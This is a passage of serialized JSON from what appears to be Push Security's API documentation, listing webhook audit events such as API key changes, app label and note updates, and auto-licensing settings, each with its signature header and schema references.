Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_635"}},"schemaId":"schema_635","pointer":"/paths/admin-role-updated/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"admin-role-updated","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_635"}},"responseCodes":["2XX"],"pointer":"admin-role-updated","href":"audit/admin-role-updated-event","openApiOperationId":"admin-role-updated-event","summary":"Admin role updated"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_635","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_635"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/admin-role-updated/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/admin-role-updated-event"}],"panels":[]}]},"httpPath":"admin-role-updated"},{"label":"API key added","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/api-key-added-event","routeSlug":"/webhooks-v1/audit/api-key-added-event","metadata":{"seo":{"title":"API key added","description":"An admin user has added a new API Key."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"api-key-added-event","name":"API key added","isWebhook":true,"pointer":"/paths/api-key-added/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"API key added","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has added a new API Key."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/api-key-added/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_636"}},"schemaId":"schema_636","pointer":"/paths/api-key-added/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"api-key-added","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_636"}},"responseCodes":["2XX"],"pointer":"api-key-added","href":"audit/api-key-added-event","openApiOperationId":"api-key-added-event","summary":"API key added"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_636","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_636"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/api-key-added/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/api-key-added-event"}],"panels":[]}]},"httpPath":"api-key-added"},{"label":"API key removed","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/api-key-removed-event","routeSlug":"/webhooks-v1/audit/api-key-removed-event","metadata":{"seo":{"title":"API key removed","description":"An admin user has removed an API Key."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"api-key-removed-event","name":"API key removed","isWebhook":true,"pointer":"/paths/api-key-removed/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"API key removed","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has removed an API Key."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/api-key-removed/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_637"}},"schemaId":"schema_637","pointer":"/paths/api-key-removed/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"api-key-removed","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_637"}},"responseCodes":["2XX"],"pointer":"api-key-removed","href":"audit/api-key-removed-event","openApiOperationId":"api-key-removed-event","summary":"API key removed"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_637","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_637"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/api-key-removed/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/api-key-removed-event"}],"panels":[]}]},"httpPath":"api-key-removed"},{"label":"App approval status updated","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/app-approval-status-updated-event","routeSlug":"/webhooks-v1/audit/app-approval-status-updated-event","metadata":{"seo":{"title":"App approval status updated","description":"The approval status of an app has been updated"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"app-approval-status-updated-event","name":"App approval status updated","isWebhook":true,"pointer":"/paths/app-approval-status-updated/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"App approval status updated","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"The approval status of an app has been updated"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/app-approval-status-updated/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_638"}},"schemaId":"schema_638","pointer":"/paths/app-approval-status-updated/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"app-approval-status-updated","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_638"}},"responseCodes":["2XX"],"pointer":"app-approval-status-updated","href":"audit/app-approval-status-updated-event","openApiOperationId":"app-approval-status-updated-event","summary":"App approval status updated"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_638","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_638"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/app-approval-status-updated/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/app-approval-status-updated-event"}],"panels":[]}]},"httpPath":"app-approval-status-updated"},{"label":"App labels added","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/app-labels-added-event","routeSlug":"/webhooks-v1/audit/app-labels-added-event","metadata":{"seo":{"title":"App labels added","description":"A set of labels has been added to one or more apps."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"app-labels-added-event","name":"App labels added","isWebhook":true,"pointer":"/paths/app-labels-added/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"App labels added","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"A set of labels has been added to one or more apps."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/app-labels-added/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_639"}},"schemaId":"schema_639","pointer":"/paths/app-labels-added/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"app-labels-added","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_639"}},"responseCodes":["2XX"],"pointer":"app-labels-added","href":"audit/app-labels-added-event","openApiOperationId":"app-labels-added-event","summary":"App labels added"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_639","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_639"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/app-labels-added/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/app-labels-added-event"}],"panels":[]}]},"httpPath":"app-labels-added"},{"label":"App labels removed","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/app-labels-removed-event","routeSlug":"/webhooks-v1/audit/app-labels-removed-event","metadata":{"seo":{"title":"App labels removed","description":"A set of labels has been removed from one or more apps."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"app-labels-removed-event","name":"App labels removed","isWebhook":true,"pointer":"/paths/app-labels-removed/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"App labels removed","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"A set of labels has been removed from one or more apps."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/app-labels-removed/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_640"}},"schemaId":"schema_640","pointer":"/paths/app-labels-removed/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"app-labels-removed","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_640"}},"responseCodes":["2XX"],"pointer":"app-labels-removed","href":"audit/app-labels-removed-event","openApiOperationId":"app-labels-removed-event","summary":"App labels removed"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_640","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_640"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/app-labels-removed/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/app-labels-removed-event"}],"panels":[]}]},"httpPath":"app-labels-removed"},{"label":"App notes updated","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/app-notes-updated-event","routeSlug":"/webhooks-v1/audit/app-notes-updated-event","metadata":{"seo":{"title":"App notes updated","description":"The notes of an app have been updated"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"app-notes-updated-event","name":"App notes updated","isWebhook":true,"pointer":"/paths/app-notes-updated/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"App notes updated","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"The notes of an app have been updated"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/app-notes-updated/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_641"}},"schemaId":"schema_641","pointer":"/paths/app-notes-updated/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"app-notes-updated","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_641"}},"responseCodes":["2XX"],"pointer":"app-notes-updated","href":"audit/app-notes-updated-event","openApiOperationId":"app-notes-updated-event","summary":"App notes updated"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_641","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_641"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/app-notes-updated/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/app-notes-updated-event"}],"panels":[]}]},"httpPath":"app-notes-updated"},{"label":"App owner ID updated","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/app-owner-id-updated-event","routeSlug":"/webhooks-v1/audit/app-owner-id-updated-event","metadata":{"seo":{"title":"App owner ID updated","description":"The owner ID of an app has been updated"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"app-owner-id-updated-event","name":"App owner ID updated","isWebhook":true,"pointer":"/paths/app-owner-id-updated/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"App owner ID updated","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"The owner ID of an app has been updated"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/app-owner-id-updated/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_642"}},"schemaId":"schema_642","pointer":"/paths/app-owner-id-updated/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"app-owner-id-updated","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_642"}},"responseCodes":["2XX"],"pointer":"app-owner-id-updated","href":"audit/app-owner-id-updated-event","openApiOperationId":"app-owner-id-updated-event","summary":"App owner ID updated"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_642","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_642"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/app-owner-id-updated/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/app-owner-id-updated-event"}],"panels":[]}]},"httpPath":"app-owner-id-updated"},{"label":"App sensitivity level updated","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/app-sensitivity-level-updated-event","routeSlug":"/webhooks-v1/audit/app-sensitivity-level-updated-event","metadata":{"seo":{"title":"App sensitivity level updated","description":"The sensitivity level of an app has been updated"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"app-sensitivity-level-updated-event","name":"App sensitivity level updated","isWebhook":true,"pointer":"/paths/app-sensitivity-level-updated/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"App sensitivity level updated","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"The sensitivity level of an app has been updated"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/app-sensitivity-level-updated/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_643"}},"schemaId":"schema_643","pointer":"/paths/app-sensitivity-level-updated/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"app-sensitivity-level-updated","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_643"}},"responseCodes":["2XX"],"pointer":"app-sensitivity-level-updated","href":"audit/app-sensitivity-level-updated-event","openApiOperationId":"app-sensitivity-level-updated-event","summary":"App sensitivity level updated"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_643","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_643"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/app-sensitivity-level-updated/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/app-sensitivity-level-updated-event"}],"panels":[]}]},"httpPath":"app-sensitivity-level-updated"},{"label":"Auto-licensing toggled","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/auto-licensing-toggled-event","routeSlug":"/webhooks-v1/audit/auto-licensing-toggled-event","metadata":{"seo":{"title":"Auto-licensing toggled","description":"An admin user has toggled the auto-licensing setting."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"auto-licensing-toggled-event","name":"Auto-licensing toggled","isWebhook":true,"pointer":"/paths/auto-licensing-toggled/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Auto-licensing toggled","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has toggled the auto-licensing setting."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/auto-licensing-toggled/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_644"}},"schemaId":"schema_644","pointer":"/paths/auto-licensing-toggled/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"auto-licensing-toggled","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_644"}},"responseCodes":["2XX"],"pointer":"auto-licensing-toggled","href":"audit/auto-licensing-toggled-event","openApiOperationId":"auto-licensing-toggled-event","summary":"Auto-licensing toggled"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_644","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_644"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/auto-licensing-toggled/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/auto-licensing-toggled-event"}],"panels":[]}]},"httpPath":"auto-licensing-toggled"},{"label":"Auto-unlicensing configuration updated","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/automatic-unlicensing-configuration-updated-event","routeSlug":"/webhooks-v1/audit/automatic-unlicensing-configuration-updated-event","metadata":{"seo":{"title":"Auto-unlicensing configuration updated","description":"An admin user updated the automatic unlicensing configuration."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"automatic-unlicensing-configuration-updated-event","name":"Auto-unlicensing configuration updated","isWebhook":true,"pointer":"/paths/automatic-unlicensing-configuration-updated/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Auto-unlicensing configuration updated","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user updated the automatic unlicensing configuration."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/automatic-unlicensing-configuration-updated/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_645"}},"schemaId":"schema_645","pointer":"/paths/automatic-unlicensing-configuration-updated/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"automatic-unlicensing-configuration-updated","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_645"}},"responseCodes":["2XX"],"pointer":"automatic-unlicensing-configuration-updated","href":"audit/automatic-unlicensing-configuration-updated-event","openApiOperationId":"automatic-unlicensing-configuration-updated-event","summary":"Auto-unlicensing configuration updated"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_645","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_645"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/automatic-unlicensing-configuration-updated/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/automatic-unlicensing-configuration-updated-event"}],"panels":[]}]},"httpPath":"automatic-unlicensing-configuration-updated"},{"label":"Blocked URLs added","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/blocked-urls-added-event","routeSlug":"/webhooks-v1/audit/blocked-urls-added-event","metadata":{"seo":{"title":"Blocked URLs added","description":"A set of URLs has been added to the URL blocking 